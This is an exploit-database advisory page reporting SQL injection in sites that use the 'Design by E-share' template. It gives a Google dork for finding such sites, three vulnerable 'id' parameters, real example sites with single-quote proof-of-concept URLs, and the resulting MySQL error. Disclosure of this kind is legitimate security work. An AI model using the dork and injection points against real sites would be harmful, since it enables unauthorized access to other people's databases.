Design by E-share Alibaba Hfceec.Com China SQL Injection Vulnerability

2018.05.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : Design by E-share Alibaba Hfceec.Com China SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos # Date : 30/05/2018 # Vendor Homepage : Hfceec.Com # Tested On : Windows # Exploit Risk : Medium # CWE: CWE-89 ################################################################################################# # Google Dork : intext:''Design by:E-share'' # Exploit : /ProductsDetail.php?id=[SQL Injection] # Exploit : /AboutUs.php?id=[SQL Injection] # Exploit : /NewsDetail.php?id=[SQL Injection] ################################################################################################# # Example Site => ammetals.com/AboutUs.php?id=1%27 [ Proof of Concept for SQL Injection ] => archive.is/1G1GR # Example Site => Alibaba Hfceec E-Share Alibaba Webpage => ammetals.en.alibaba.com # Example Site => ammetals.com/ProductsDetail.php?id=285%27 => [ Proof of Concept for SQL Injection ] => archive.is/If8pt # SQL/DB Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top